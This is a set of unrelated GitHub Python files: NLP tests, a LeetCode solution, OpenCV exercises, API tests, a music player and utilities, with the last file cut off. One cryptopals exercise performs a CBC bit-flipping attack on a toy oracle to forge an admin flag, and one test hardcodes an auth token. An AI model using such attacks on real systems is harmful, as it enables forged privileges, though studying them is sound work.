+{"seq_id":"18165878657","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Aug 10 18:39:51 2017\r\n\r\n@author: Sanju Menon\r\n\r\n*** hug -f sometests.py --manual_reload ***\r\n*** \r\nTF_IDF_Intent\r\nAmbiguousTable\r\nTable\r\npayroll_entity_extraction\r\nLocationExtraction\r\n\r\nexample-mesg.docx\r\npayroll_intent_example\r\n\r\n\r\n\r\n\"\"\"\r\n\r\nfrom IntentWithPayload import get_intent_payload\r\n\r\n\r\n\r\nimport hug\r\n\r\n \r\n@hug.cli()\r\n@hug.get()\r\n@hug.local()\r\ndef test(text: str):\r\n \r\n response = get_intent_payload(text)\r\n print(response)\r\n return {'response': response} \r\n\r\n\r\nif __name__ == '__main__':\r\n text = 'Meal Allowance \\n\\n Emp id: 052 – BTBPM1234X \\n\\t060 - GLXPS8254F'\r\n test(text)\r\n\r\n\r\n\r\n\r\n\r\n\r\n ","repo_name":"rosnet/payrollNLU","sub_path":"sometests.py","file_name":"sometests.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22787825807","text":"from collections import defaultdict\r\nfrom typing import List\r\n\r\nclass Solution:\r\n def findRedundantConnection(self, edges: List[List[int]]) -> List[int]:\r\n # Time: O(?)\r\n # Space: O(?)\r\n \r\n def arrive(current, end):\r\n # Prevent loop\r\n if current in seen:\r\n return\r\n seen.add(current)\r\n \r\n # Check if we've reached the goal\r\n if current == end:\r\n return True\r\n \r\n # Continue DFS\r\n for nextNode in adj[current]:\r\n if arrive(nextNode, end):\r\n return True\r\n \r\n # Backtrack so the node can be reused on other paths\r\n seen.remove(current)\r\n \r\n # Initialize our adjacency list\r\n adj = defaultdict(list)\r\n \r\n # Keep building our graph up edge by edge, return the one that causes redundancy\r\n seen = 
set()\r\n \r\n for n1, n2 in edges:\r\n # If we arrive at n2, that means there's already a path connected - rendering this current edge redundant\r\n if arrive(n1, n2):\r\n return [n1, n2]\r\n \r\n # Safe to connect edge\r\n adj[n1].append(n2)\r\n adj[n2].append(n1)\r\n \r\n return","repo_name":"NaralC/Algorithms-Interview-Questions","sub_path":"Leetcode/Medium/0684-Redundant-Connection.py","file_name":"0684-Redundant-Connection.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33311824131","text":"import os\nimport random\n\nfrom wrappers import MLMModelWrapper, MODEL_MAPPING\n\nimport sys\n\nimport torch\nfrom absl import app\nimport numpy as np\n\nfrom config import FLAGS\nfrom pathlib import Path\n\nfrom text_input_pipeline import GutenbergReader\nfrom my_utils.util import get_gpus_with_enough_memory\n\nFIXED_DEVICE_IDXS = None #[0]\n# CHOSEN_RUN_DIR = Path('output','constant','same')\nCHOSEN_RUN_DIR = Path('output','huggingface_baseline_encoder','no_pretrain')\n\n#TODO bring this up-to-date if gonna use\ndef main(_):\n FLAGS.device_idxs = get_gpus_with_enough_memory(\n 8000) if not FIXED_DEVICE_IDXS else FIXED_DEVICE_IDXS # Hack to not use flagvalue of og model when pertaining to GPU usage\n reader = GutenbergReader()\n data_dict = reader.get_data_dict()\n train_dataset, test_dataset, val_dataset, vocab = (data_dict[key] for key in\n ('train', 'test', 'val', 'vocab'))\n model = MLMModelWrapper(MODEL_MAPPING[FLAGS.model], vocab)\n model_device = f'cuda:{FLAGS.device_idxs[0]}' if len(FLAGS.device_idxs) != 0 else 'cpu'\n model = model.cuda(model_device)\n\n best_val_run_path = Path(latest_run_dir, 'best.th')\n model_states = [Path(latest_run_dir, m) for m in os.listdir(latest_run_dir) if 'model_state_epoch_' in m]\n latest_run_path = max(model_states, key=os.path.getmtime)\n\n for trained_model_path in (best_val_run_path, latest_run_path):\n print(f'Testing {trained_model_path}')\n model.load_state_dict(torch.load(trained_model_path,map_location=torch.device(model_device)))\n model = model.cuda(model_device)\n model.eval() # Set to eval mode\n for name, dataset in zip(('Train', 'Test', 'Val'), (train_dataset, test_dataset, val_dataset)):\n print(f'Testing {name}')\n instances = random.sample(dataset, 1)\n predictions = model.forward_on_instances(\n instances)\n input_texts = [tokens_to_mask_aware_text(model.token_indexer,\n model.token_indexer.convert_ids_to_tokens(\n instances[batch_sample].fields['input_ids'].array),\n predictions[batch_sample]['mask'])\n for batch_sample in range(len(predictions))]\n input_ids = torch.cat([instance.as_tensor_dict()['input_ids'][None,:] for instance in instances]).numpy()\n prediction_ids = np.vstack([pred['vocab_scores'].argmax(1)[None,:] for pred in predictions])\n mask = np.vstack([predictions[batch_sample]['mask'] for batch_sample in range(len(predictions))])\n filled_in_predictions = np.where(mask,\n prediction_ids,\n input_ids)\n predicted_texts = [tokens_to_mask_aware_text(model.token_indexer,\n model.token_indexer.convert_ids_to_tokens(\n predictions[batch_sample]['vocab_scores'].argmax(1)),\n predictions[batch_sample]['mask'])\n for batch_sample in range(len(predictions))]\n\n filled_in_predicted_texts = [tokens_to_mask_aware_text(model.token_indexer,\n model.token_indexer.convert_ids_to_tokens(\n filled_in_predictions[batch_sample]),\n predictions[batch_sample]['mask'])\n for batch_sample in range(len(predictions))]\n for input_text, 
predicted_text, filled_in_predicted_text in zip(input_texts, predicted_texts, filled_in_predicted_texts):\n print(f'Input: {input_text}')\n print(f'Filled in Prediction: {filled_in_predicted_text}')\n print(f'All output: {predicted_text}')\n print(' ')\n\n\n# Copied from HF transformers\ndef tokens_to_mask_aware_text(tokenizer, filtered_tokens, mask,\n skip_special_tokens=False, clean_up_tokenization_spaces=True):\n # To avoid mixing byte-level and unicode for byte-level BPE\n # we need to build string separately for added tokens and byte-level tokens\n # cf. https://github.com/huggingface/transformers/issues/1133\n sub_texts = []\n current_sub_text = []\n for token, isMasked in zip(filtered_tokens, mask):\n if skip_special_tokens and token in tokenizer.all_special_ids:\n continue\n if token in tokenizer.added_tokens_encoder:\n if current_sub_text:\n sub_texts.append(tokenizer.convert_tokens_to_string(current_sub_text))\n current_sub_text = []\n sub_texts.append(token)\n else:\n if isMasked:\n current_sub_text.append(tokenizer.mask_token)\n current_sub_text.append(token)\n current_sub_text.append(tokenizer.mask_token)\n else:\n current_sub_text.append(token)\n if current_sub_text:\n sub_texts.append(tokenizer.convert_tokens_to_string(\n current_sub_text))\n text = \" \".join(sub_texts)\n\n if clean_up_tokenization_spaces:\n clean_text = tokenizer.clean_up_tokenization(text)\n return clean_text\n else:\n return text\n\n\nif __name__ == '__main__':\n all_runs = [Path('.', 'output', model_dir, run)\n for model_dir in os.listdir(Path('.', 'output')) for run in os.listdir(Path('.', 'output', model_dir))\n if os.path.isdir(Path('.', 'output', model_dir)) and os.path.isdir(Path('.', 'output', model_dir, run))]\n latest_run_dir = max(all_runs, key=os.path.getmtime) if not CHOSEN_RUN_DIR else CHOSEN_RUN_DIR\n flagfile = Path(latest_run_dir, 'flagfile.txt')\n app.run(main, sys.argv + [f'--flagfile={flagfile}'])\n","repo_name":"Natithan/DIRT","sub_path":"src/check_predictions_qualitative.py","file_name":"check_predictions_qualitative.py","file_ext":"py","file_size_in_byte":6071,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"22636704202","text":"import cv2\nimport numpy as np\n\n######### ex-01 ############\n# A white rectangle inside a black square\n# image_rectangle = np.ones((400,400), dtype='uint8') # create a black square\n# cv2.rectangle(image_rectangle, (50,50),(300,300),(255,255,255), -1) # the white rectangle drawn inside\n# cv2.imshow(\"image show\", image_rectangle)\n# cv2.waitKey(0)\n\n\n######### ex-02 ############\n# A white circle inside a black square\n# img_circle = np.ones((400,400), dtype='uint8')\n# cv2.circle(img_circle, (300,300), 70, (255,255,255), -1)\n# cv2.imshow(\"image show\", img_circle)\n# cv2.waitKey(0)\n\n######### ex-03 ############\n#### Let's look at bitwise operations (easy to understand as unions and intersections)\n# Reusing two lines each from above.\nimg_rectangle = np.ones((400,400), dtype='uint8')\ncv2.rectangle(img_rectangle, (50,50),(300,300),(255,255,255), -1) \nimg_circle = np.ones((400,400), dtype='uint8')\ncv2.circle(img_circle, (300,300), 70, (255,255,255), -1)\n\n\n### AND\n# bitwiseAnd = cv2.bitwise_and(img_rectangle, img_circle)\n# cv2.imshow(\"image bitwiseAnd\", bitwiseAnd)\n# cv2.waitKey(0)\n\n### OR\n# bitwiseOr = cv2.bitwise_or(img_rectangle, img_circle)\n# cv2.imshow(\"image bitwiseOr\", bitwiseOr)\n# cv2.waitKey(0)\n\n### XOR (symmetric difference)\n# bitwiseXor = cv2.bitwise_xor(img_rectangle, img_circle)\n# cv2.imshow(\"image bitwiseXor\", bitwiseXor)\n# cv2.waitKey(0)\n\n### NOT\n# based on the rectangle\n# bitwiseNot = 
cv2.bitwise_not(img_rectangle)\n# cv2.imshow(\"rectangle Not\", bitwiseNot)\n# cv2.waitKey(0)\n\n\n# based on the circle\n# bitwiseNot = cv2.bitwise_not(img_circle)\n# cv2.imshow(\"circle Not\", bitwiseNot)\n# cv2.waitKey(0)\n\n\n######### ex-04 masking ############\nmask = np.zeros((683,1024,3), dtype='uint8') # without the trailing 3 after 683,1024 you only get grayscale (color reportedly won't work)\ncv2.rectangle(mask, (60,50), (280,280), (255,255,255), -1)\ncv2.rectangle(mask, (420,50), (550,230), (255,255,255), -1)\ncv2.rectangle(mask, (750,50), (920,280), (255,255,255), -1) \ncv2.imshow('....', mask)\ncv2.waitKey(0)\n\n#################### assignment ##########################\n# img = cv2.imread('./face.png')\n# print(img.shape)\n# mask = np.zeros_like(img)\n# # mask = np.zeros((300,332), dtype='uint8')\n# # cv2.rectangle(mask, (60,50), (280,280), (255,255,255), -1)\n# # cv2.rectangle(mask, (420,50), (550,230), (255,255,255), -1)\n# # cv2.rectangle(mask, (750,50), (920,280), (255,255,255), -1)\n# masked = cv2.bitwise_and(img, mask)\n# cv2.imshow('....', masked)\n# cv2.waitKey(0)","repo_name":"Byunggu-Son/MS_AI_School","sub_path":"이미지 다루기 및 데이터셋 구축/DAY47-22_12_08_image preprocessing & OpenCV/ex_02.py","file_name":"ex_02.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16781265632","text":"#!/usr/bin/env python3\n\nimport cryptolib\n\n## SECRET DATA\nPREF = b'comment1=cooking%20MCs;userdata='\nSUFF = b';comment2=%20like%20a%20pound%20of%20bacon'\nBS = 16\nIV = cryptolib.randbin(BS)\nKey = cryptolib.randbin(BS)\n##\n\ndef encrypt(userdata: str) -> bytes:\n # NB1: The statement is unclear about \"quoting out\" ';' and '=' from the whole\n # data or only from the userdata part. We consider here that it makes more\n # sense to only apply this to the userdata. This does not change anything\n # to the attack anyway...\n # NB2: We encode the data here. 
Otherwise, it would simply be possible to\n # inject arbitrary data and to build an arbitrary CBC encrypted message\n # block-by-block past the prefix (no need for the bitflipping attack).\n userdata = userdata.replace(';','\";\"').replace('=','\"=\"').encode()\n data = PREF + userdata + SUFF\n return cryptolib.AES_CBC_encrypt(Key, IV, cryptolib.pad(data, BS))\n\nTARGET = b';admin=true;'\ndef decrypt(ciph: bytes) -> bool:\n data = cryptolib.unpad(cryptolib.AES_CBC_decrypt(Key, IV, ciph), BS)\n # NB: The attack would not work if we had decoded the data here (as the\n # modified encrypted block will be decrypted to seemingly random data).\n print(data)\n return TARGET in data\n\nif __name__=='__main__':\n assert not decrypt(encrypt(TARGET.decode()))\n # We have seen in previous challenges how to detect:\n # - ECB/CBC mode\n # - the block size BS\n # - the size of the prefix and suffix data\n # hence, to focus on the attack, we assume here that\n # we already know it is CBC, BS and the prefix size.\n PREF_SIZE = len(PREF)\n target = bytearray(TARGET)\n # we flip the parity bit of the filtered bytes of the target\n flips = [i for i,c in enumerate(target) if c in b';=']\n for b in flips:\n target[b] ^= 1\n target = target.decode()\n # we inject the userdata\n r = (-PREF_SIZE)%BS\n ciph = encrypt('0'*r + target)\n # and flip the corresponding bits in the previous block\n off = ((PREF_SIZE-1)//BS)*BS\n ciph = bytearray(ciph)\n for b in flips:\n ciph[off+b] ^= 1\n # this block will be decrypted to seemingly random data\n # then the next one will be corrected to the target\n assert decrypt(ciph)\n","repo_name":"blegloannec/cryptopals","sub_path":"2/2.16.py","file_name":"2.16.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15384211147","text":"\"\"\"\n* Assignment: Loop For Text\n* Required: no\n* Complexity: medium\n* Lines of code: 14 lines\n* Time: 13 min\n\nEnglish:\n 1. Given is text of the \"Moon Speech\" by John F. Kennedy's [1]\n 2. Sentences are separated by period (`.`)\n 3. Clean each sentence from whitespaces at the beginning and at the end\n 4. Words are separated by spaces\n 5. Print the total number of each of the following in the whole text:\n a. adverbs (words ending with \"ly\")\n b. sentences\n c. words\n d. letters\n e. characters (including spaces inside sentences, but not commas `,`)\n f. 
commas (`,`)\n 6. Run doctests - all must succeed\n\nPolish:\n 1. Dany jest tekst przemówienia \"Moon Speech\" wygłoszonej\n przez John F. Kennedy'ego [1]\n 2. Zdania oddzielone są kropkami (`.`)\n 3. Każde zdanie oczyść z białych znaków na początku i końcu\n 4. Słowa oddzielone są spacjami\n 5. Wypisz także ile jest łącznie w całym tekście:\n a. przysłówków (słów zakończonych na \"ly\")\n b. zdań\n c. słów\n d. liter\n e. znaków (łącznie ze spacjami wewnątrz zdań, ale bez przecinków `,`)\n f. przecinków (`,`)\n 6. Uruchom doctesty - wszystkie muszą się powieść\n\nReferences:\n [1] Kennedy, J.F. Moon Speech - Rice Stadium.\n Year: 1962.\n Retrieved: 2021-03-06.\n URL: http://er.jsc.nasa.gov/seh/ricetalk.htm\n\nTests:\n >>> import sys; sys.tracebacklimit = 0\n\n >>> assert result is not Ellipsis, \\\n 'Assign your result to variable `result`'\n >>> assert type(result) is dict, \\\n 'Variable `result` has invalid type, should be dict'\n\n >>> print(result) # doctest: +NORMALIZE_WHITESPACE\n {'sentences': 7,\n 'words': 71,\n 'characters': 347,\n 'letters': 283,\n 'commas': 1,\n 'adverbs': 0}\n\"\"\"\n\nTEXT = \"\"\"\n We choose to go to the Moon.\n We choose to go to the Moon in this decade and do the other things.\n Not because they are easy, but because they are hard.\n Because that goal will serve to organize and measure the best of our energies and skills.\n Because that challenge is one that we are willing to accept.\n One we are unwilling to postpone.\n And one we intend to win\n\"\"\"\n\n# Number of occurrences of each grammar object\n# type: dict[str,int]\nresult = {\n 'sentences': 0,\n 'words': 0,\n 'characters': 0,\n 'letters': 0,\n 'commas': 0,\n 'adverbs': 0,\n}\n\n# Solution\nfor sentence in TEXT.split('.'):\n sentence = sentence.strip()\n words = sentence.split()\n letters = sentence.replace(',', '').replace(' ', '')\n characters = sentence.replace(',', '')\n commas = sentence.count(',')\n\n result['sentences'] += 1\n result['words'] += len(words)\n result['letters'] += len(letters)\n result['characters'] += len(characters)\n result['commas'] += commas\n\n for word in words:\n if word.endswith('ly'):\n result['adverbs'] += 1\n","repo_name":"astromatt/python3.info","sub_path":"basics/loop/assignments/loop_nested_c.py","file_name":"loop_nested_c.py","file_ext":"py","file_size_in_byte":2920,"program_lang":"python","lang":"en","doc_type":"code","stars":158,"dataset":"github-code","pt":"67"} +{"seq_id":"26144924001","text":"import requests\n\n\nclass TestCourses:\n # Just for TokenAuthentication - Change in settings project\n # https://www.django-rest-framework.org/api-guide/authentication/#tokenauthentication\n headers = {'Authorization': 'Token 51caba258784f54c952f193d8df916b71d3b911c'}\n baseURL = 'http://localhost:8000/api/courses/'\n\n def test_get_courses(self):\n response = requests.get(url=self.baseURL, headers=self.headers)\n\n assert response.status_code == 200\n\n def test_get_course(self):\n response = requests.get(url=f'{self.baseURL}4')\n\n assert response.status_code == 200\n\n def test_post_course(self):\n data = {\n \"title\": \"Curso teste22\",\n \"url\": \"http://cursoteste22.com\"\n }\n response = requests.post(url=self.baseURL, headers=self.headers, data=data)\n\n assert response.status_code == 201\n assert response.json()['title'] == data['title']\n\n def test_put_course(self):\n data = {\n \"title\": \"test updated course\",\n \"url\": \"testupdated.com.br\"\n }\n response = requests.put(url=self.baseURL, headers=self.headers, data=data)\n\n assert 
response.status_code == 200\n assert response.json()['title'] == data['title']\n\n def test_delete_course(self):\n response = requests.delete(url=self.baseURL, headers=self.headers)\n\n assert response.status_code == 204 and len(response.text) == 0\n","repo_name":"isaias0rt0n/school-api","sub_path":"test_pytest.py","file_name":"test_pytest.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"24057828321","text":"from yandex_music import Client\nfrom yandex_music.exceptions import UnauthorizedError\nimport time\nimport vlc\nimport os\nimport sys\nimport random\n\n\nclear = lambda: os.system('cls')\n\ndef getClient():\n try:\n with open('token.txt') as file:\n token = file.readline()\n\n client = Client(token).init()\n print('Successful authorization.')\n except UnauthorizedError:\n print('Your OAuth token is likely expired')\n sys.exit()\n except Exception:\n print(\"Can't read \\\"token.txt\\\"\")\n sys.exit()\n\n return client\n\n\nclient = getClient()\nuserPlaylist = client.users_likes_tracks()\ntracks = len(userPlaylist.tracks)\ntracks = list(range(tracks))\nrandom.shuffle(tracks)\n\ntrackIndex = 0\n\nsongs = [{'name': '', 'track': userPlaylist[tracks[trackIndex]].fetch_track()},\n {'name': '', 'track': None}]\n\nwhile not(songs[0]['track'].available):\n trackIndex += 1\n songs[0]['track'] = userPlaylist[tracks[trackIndex]].fetch_track()\n\n if trackIndex >= len(tracks):\n print(\"All tracks unavailable.\")\n input('Press Enter to exit')\n sys.exit()\n\n\nclear()\nprint('Downloading...')\nsongs[0]['track'].download('song0.mp3')\nname = ''\nfor artist in songs[0]['track'].artists:\n name += (artist.name + ', ')\nname = name[0:-2]\n \nsongs[0]['name'] = f\"{name} - {songs[0]['track'].title}\"\n\nqueue = 0\nwhile True:\n clear()\n print(songs[queue]['name'])\n player = vlc.MediaPlayer('song'+ str(queue) +'.mp3')\n player.play()\n \n queue = (queue + 1) % 2\n trackIndex += 1\n\n songs[queue]['track'] = userPlaylist[tracks[trackIndex]].fetch_track()\n while not(songs[queue]['track'].available):\n trackIndex += 1\n songs[queue]['track'] = userPlaylist[tracks[trackIndex]].fetch_track()\n\n if trackIndex >= len(tracks):\n trackIndex = 0\n songs[queue]['track'] = userPlaylist[tracks[trackIndex]].fetch_track()\n\n songs[queue]['track'].download('song'+ str(queue) +'.mp3')\n \n name = ''\n for artist in songs[queue]['track'].artists:\n name += (artist.name + ', ')\n name = name[0:-2]\n \n songs[queue]['name'] = f\"{name} - {songs[queue]['track'].title}\"\n\n length = player.get_length()\n\n while not(length):\n time.sleep(1)\n length = player.get_length()\n\n position = player.get_position()\n time.sleep((1 - position) * length / 1000)","repo_name":"John-Nerevarine/training-projects","sub_path":"yndx-msc/yndxMsc.py","file_name":"yndxMsc.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"13942610556","text":"from mrjob.job import MRJob\n\nclass MRUsuariosPeliculasPro(MRJob):\n\n def mapper(self, _, line):\n fields = line.split(',') \n\n pelicula = fields[1]\n rating = float(fields[2])\n\n yield pelicula, (1, rating)\n\n def reducer(self, pelicula, valores):\n usuarios_totales = 0\n rating_total = 0\n\n for value in valores:\n usuarios_totales += value[0]\n rating_total += value[1]\n \n average_rating = rating_total / usuarios_totales\n yield pelicula, (usuarios_totales, average_rating)\n \n
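# Illustrative walk-through (the CSV layout is assumed from the mapper above,\n# i.e. rows like \"user,movie,rating,timestamp\"): the line \"196,242,3.0,881250949\"\n# makes the mapper yield (\"242\", (1, 3.0)); the reducer then sums the counts and\n# ratings per movie and emits (\"242\", (total_users, average_rating)).\n\n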
if __name__ == '__main__':\n MRUsuariosPeliculasPro.run()","repo_name":"mpocampod/Reto","sub_path":"retoCodigos/peliculas/usuarios_peliculas.py","file_name":"usuarios_peliculas.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"12255246259","text":"from logging import getLogger\nfrom sdmx2jsonld.common.commonclass import CommonClass\nfrom json import load\nfrom random import getrandbits\nfrom os.path import dirname, join\n\nlogger = getLogger()\n\n\nclass Distribution(CommonClass):\n def __init__(self):\n super().__init__(entity=\"Distribution\")\n self.data = {\n \"id\": \"urn:ngsi-ld:Distribution:\",\n \"type\": \"Distribution\",\n \"accessUrl\": {\n \"type\": \"Property\",\n \"value\": [\"/ngsi-ld/v1/entities?type=https://smartdatamodels.org/dataModel.SDMX/Observation\"],\n },\n \"description\": {\n \"type\": \"Property\",\n \"value\": \"Distribution of statistical data observations.\",\n },\n \"format\": {\"type\": \"Property\", \"value\": \"JSON_LD\"},\n \"language\": {\"type\": \"Property\", \"value\": list()},\n \"status\": {\"type\": \"Property\", \"value\": \"Completed\"},\n \"title\": {\"type\": \"Property\", \"value\": list()},\n \"@context\": [\n \"https://raw.githubusercontent.com/smart-data-models/dataModel.STAT-DCAT-AP/master/context.jsonld\"\n ],\n }\n\n def generate_data(self, catalogue):\n # Generate random id for the distribution\n random_bits = getrandbits(128)\n hash1 = \"%032x\" % random_bits\n self.data[\"id\"] += hash1\n\n # Title is extracted from the dcterms:title of the Catalogue\n self.data[\"title\"][\"value\"] = catalogue.data[\"title\"][\"value\"]\n\n # language is obtained from the language of the Catalogue\n self.data[\"language\"][\"value\"] = catalogue.data[\"language\"][\"value\"]\n\n # accessURL is generated from the configuration file.\n config_path = dirname(dirname(dirname(__file__)))\n config_path = join(join(config_path, \"common\"), \"config.json\")\n with open(config_path) as config_file:\n config = load(config_file)\n\n self.data[\"accessUrl\"][\"value\"][0] = config[\"broker\"] + self.data[\"accessUrl\"][\"value\"][0]\n","repo_name":"flopezag/IoTAgent-Turtle","sub_path":"sdmx2jsonld/transform/distribution.py","file_name":"distribution.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"14370726825","text":"import discord\nfrom embeds import get_default_embed\nfrom resources import get_emoji, get_icon\nfrom utils import unix_timestamp, room_url, img_url\nfrom utils.formatters import format_warnings\nfrom recnetpy.dataclasses.room import Room\nfrom database import RoomStats\n\ndef room_embed(room: Room, cached_stats: RoomStats = \"None\", hide_details: bool = False) -> discord.Embed:\n \"\"\"\n Makes an embed for a single room\n \"\"\"\n \n em = get_default_embed()\n em.title = f\"^{room.name}\"\n em.url = room_url(room.name)\n \n warnings = None\n if not hide_details: \n em.set_image(url=img_url(room.image_name))\n em.description = f\"```{room.description}```\"\n thumbnail_url = get_icon(\"rro\") if room.is_rro else get_icon(\"ugc\")\n em.set_thumbnail(url=thumbnail_url)\n \n # Warnings\n warnings = format_warnings(room.warnings)\n custom_warning = f\"```{room.custom_warning}```\"\n \n if warnings: em.add_field(name=\"Warnings\", value=\" \".join(warnings), inline=False)\n if room.custom_warning: em.add_field(name=\"Custom Warning\", value=custom_warning, inline=False)
\n else:\n em.set_thumbnail(url=img_url(room.image_name))\n \n # Player retention \n retention = round(room.visit_count / room.visitor_count, 2) if room.visitor_count > 0 else 0\n \n # Cheer ratio\n cheer_ratio = round((room.cheer_count / room.visitor_count) * 100, 2) if room.visitor_count > 0 else 0\n \n cheer_dif, favorite_dif, visitor_dif, visit_dif, last_check = 0, 0, 0, 0, 0\n if cached_stats not in (\"None\", None):\n cheer_dif = room.cheer_count - cached_stats.cheers if room.cheer_count != cached_stats.cheers else 0\n favorite_dif = room.favorite_count - cached_stats.favorites if room.favorite_count != cached_stats.favorites else 0\n visitor_dif = room.visitor_count - cached_stats.visitors if room.visitor_count != cached_stats.visitors else 0\n visit_dif = room.visit_count - cached_stats.visits if room.visit_count != cached_stats.visits else 0\n last_check = cached_stats.cached_timestamp\n \n statistics = [\n f\"{get_emoji('cheer')} `{room.cheer_count:,}`{f' *(+{cheer_dif:,})*' if cheer_dif else ''} — Cheers\",\n f\"{get_emoji('favorite')} `{room.favorite_count:,}`{f' *(+{favorite_dif:,})*' if favorite_dif else ''} — Favorites\",\n f\"{get_emoji('visitors')} `{room.visitor_count:,}`{f' *(+{visitor_dif:,})*' if visitor_dif else ''} — Visitors\",\n f\"{get_emoji('visitor')} `{room.visit_count:,}`{f' *(+{visit_dif:,})*' if visit_dif else ''} — Visits\",\n f\"{get_emoji('visitors')} `{retention}` — Average Revisits\",\n f\"{get_emoji('cheer')} `{cheer_ratio}%` — Cheer to Visitor Ratio\"\n ]\n \n if last_check:\n statistics.append(f\"\\nYou last checked this room out {unix_timestamp(last_check, 'R')}!\")\n elif cached_stats != \"None\":\n statistics.append(f\"\\nYou can see the statistical difference the next time you view this room!\")\n \n if statistics:\n em.add_field(name=\"Statistics\", value=\"\\n\".join(statistics), inline=False)\n \n em.set_footer(text=\"Information is cut due to API limitations. We are working with Rec Room to bring back data.\", icon_url=get_icon(\"rectnet\"))\n\n return em\n\n\nasync def fetch_room_embed(room: Room, *args, **kwargs) -> discord.Embed:\n \"\"\"\n Fetches the necessary data and returns the embed\n \"\"\"\n room = await room.client.rooms.fetch(room.id, 78)\n return room_embed(room, *args, **kwargs)","repo_name":"RecNetBot-Development/RecNetBot","sub_path":"embeds/room_embed.py","file_name":"room_embed.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"31549352034","text":"# First we import the \"random\" module\nimport random\n\n# Now we create a function named head_or_tails (I couldn't think of any professional name)\n\ndef head_or_tails():\n\n# Now i created a variable coin which i assigned to a list that contains heads or tails\n# and then passed to the random.choice function, which i later assigned to computer; the reason\n# why i used the .lower() function is because some people might write it in uppercase or lowercase\n# you can make it whatever case suits you\n\n coin = ['Heads', 'Tails']\n computer = random.choice(coin).lower()\n\n# After that i took the input from the user and lowercased it. Why, you may ask? It's written ↑ \n# then i printed computer so we can be sure we know what came up\n\n user = input(\"Heads or tails ? \").lower()\n print(computer)
\").lower()\n print(computer)\n\n# Now, you might be able to tell what this code means, right.\n# No, well heres a brief explanation\n# We used an if statement to see if the the value the user chosed si equal to the value computer chose\n# If it is true we print you win if fase you lose\n\n if user == computer:\n print(\"You win!\")\n else:\n print(\"You lose.\")\n\n# Now the real code begins here\n# We use a while loop and give it a condition that do you want to play and took he users input and lowercased it\n# Now, if the you chose No you whould break the while loop and will not be able to play and brek out of the loop\n# But if you chose yes you will later on continue the loop and later be able to play\n\nwhile True:\n print(\"Do you want to play?:\")\n human = input(\"Yes or No : \").lower()\n\n if human == \"no\":\n print(\"bye bye\")\n break\n elif human != \"yes\":\n print(\"Invalid Input\")\n continue\n\n head_or_tails()\n\n# Hope you like it\n","repo_name":"alikhan819/My-Portfolio","sub_path":"Coin.py","file_name":"Coin.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"39411519799","text":"from functools import wraps\n\nfrom rate_limit.core import RedisRateLimiter\n\nAPI = 'API'\n\n\ndef rate_limit(system=None, redis_url=None, limit=1, window=1, blocking_timeout=None, request_method=None):\n '''\n :param system: Имя вашего приложения либо константа 'Api'\n :param redis_url: Адрес redis\n :param limit: Разрешенное количество запросов\n :param window: Временное окно в секундах в котором выполняется разрешенное количество запросов\n :param blocking_timeout: Время ожидания блокировки исходящих запросов\n :param request_method: Базовый адрес запроса (шаблон урла)\n :return: response\n '''\n def decorator(func):\n if system == API or system.upper() == API:\n @wraps(func)\n def wrapper(request, *args, **kwargs):\n request_method = request.method\n user = request.user\n url_pattern = str(request.resolver_match.route)\n method_name = f\"{request_method} {url_pattern}\"\n redis_ratelimiter = RedisRateLimiter(\n system=system,\n key=method_name,\n redis_url=redis_url,\n limit=limit,\n window=window,\n blocking_timeout=blocking_timeout,\n user=user\n )\n is_limited = redis_ratelimiter.is_limited()\n if is_limited:\n return func(request, *args, **kwargs)\n return redis_ratelimiter.limited()\n else:\n @wraps(func)\n def wrapper(*args, **kwargs):\n method_name = kwargs.get(\"method_name\")\n if method_name:\n kwargs.pop(\"method_name\")\n if not method_name:\n method_name = args[0].base_url\n if method_name:\n if request_method:\n method_name = f\"{request_method} {method_name}\"\n\n return RedisRateLimiter(\n system=system,\n key=method_name,\n redis_url=redis_url,\n limit=limit,\n window=window,\n blocking_timeout=blocking_timeout,\n ).redis_rate_limit(func, *args, **kwargs)\n else:\n return func(*args, **kwargs)\n return wrapper\n\n return decorator\n","repo_name":"allkotraz/django-rate-limit","sub_path":"decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"27293559518","text":"import pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom wordcloud import WordCloud\nimport spacy\nimport spacy.cli\n# spacy.cli.download(\"en_core_web_lg\")\n# import 
